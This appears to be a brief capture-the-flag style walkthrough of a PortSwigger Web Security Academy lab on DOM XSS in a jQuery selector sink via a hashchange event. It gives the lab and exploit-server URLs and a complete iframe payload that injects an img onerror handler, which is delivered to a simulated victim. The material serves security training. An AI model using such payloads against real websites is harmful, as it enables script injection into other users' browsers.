Port Swigger DOM XSS in jQuery selector sink using

DOM XSS in jQuery selector sink using a hashchange event

Solution

Open the website: https://0aba006d03c1d3e18043b70300b5001e.web-security-academy.net/post?postId=3

https://0aba006d03c1d3e18043b70300b5001e.web-security-academy.net/post?postId=3

Open the website: https://exploit-0a0d00e103dad35880d1b663014f0055.exploit-server.net/ (exploit server)

https://exploit-0a0d00e103dad35880d1b663014f0055.exploit-server.net/

Create exploit

Payload: <iframe src="https://0aba006d03c1d3e18043b70300b5001e.web-security-academy.net/#" onload="this.src+='<img src=x onerror=print()>'"></iframe>

Sent exploit via "Delivery exploit to victim"

Click button : Delivery exploit to victim